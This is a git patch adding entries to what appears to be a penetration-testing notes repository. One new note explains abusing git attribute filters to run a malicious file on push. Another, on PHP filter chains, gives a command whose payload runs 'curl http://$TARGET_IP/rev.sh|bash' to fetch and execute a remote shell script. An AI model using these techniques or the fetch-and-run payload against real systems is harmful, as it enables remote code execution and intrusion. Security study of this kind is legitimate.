From cc02384f373220cd24e0a088161a9a3535c54595 Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Fri, 3 Mar 2023 19:04:59 +0100
Subject: [PATCH] added git attributes exploit possibility

---
 Exploits/Git/Git Attributes.md  | 14 ++++++++++++++
 Exploits/References.md          |  4 +++-
 Exploits/Web/PHP Filer Chain.md |  7 +++++++
 3 files changed, 24 insertions(+), 1 deletion(-)
 create mode 100644 Exploits/Git/Git Attributes.md
 create mode 100644 Exploits/Web/PHP Filer Chain.md

diff --git a/Exploits/Git/Git Attributes.md b/Exploits/Git/Git Attributes.md
new file mode 100644
index 0000000..68e5782
--- /dev/null
+++ b/Exploits/Git/Git Attributes.md	
@@ -0,0 +1,14 @@
+# Git Attributes
+
+[Git Attributes]( https://www.git-scm.com/docs/gitattributes) can be used to introduce scripts modifying files before pushing. That means the you can prepare a scripts for example linting by filtetype, and  call it via attributes afterwards.
+Therefore, you need to create an attributes file at `.git/info/attributes`. Insert something that makes sense, e.g.
+```sh
+echo "*.py filter=indent" > .git/info/attributes
+```
+
+reference the file as the filter via
+```sh
+git config filter.indent.clean /dev/shm/$MALICIOUS_FILE
+```
+
+Push to origin afterwards to trigger the filter file
diff --git a/Exploits/References.md b/Exploits/References.md
index 77d2b52..78a072a 100644
--- a/Exploits/References.md
+++ b/Exploits/References.md
@@ -3,11 +3,13 @@
 [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings.git)
 
 ## Recover git Repositories
+
 [Internetwache's gitTools](https://github.com/internetwache/GitTools.git)
 
 ## Web
 
-[Padbuster - padding Oracle Attacks](https://github.com/AonCyberLabs/PadBuster.git)
+* [Padbuster - padding Oracle Attacks](https://github.com/AonCyberLabs/PadBuster.git)
+* [PHP Filter Chain Generator](https://github.com/synacktiv/php_filter_chain_generator.git)
 
 ### PHP
 
diff --git a/Exploits/Web/PHP Filer Chain.md b/Exploits/Web/PHP Filer Chain.md
new file mode 100644
index 0000000..44ddc49
--- /dev/null
+++ b/Exploits/Web/PHP Filer Chain.md	
@@ -0,0 +1,7 @@
+# PHP Filter Chain Generator
+
+* [Get RCEs without uploading by chaining filters](https://github.com/synacktiv/php_filter_chain_generator)
+* Or by uploading a filtered file
+```sh
+./php_filter_chain_generator.py --chain '<?= `curl http://$TARGET_IP/rev.sh|bash` ;?>'
+```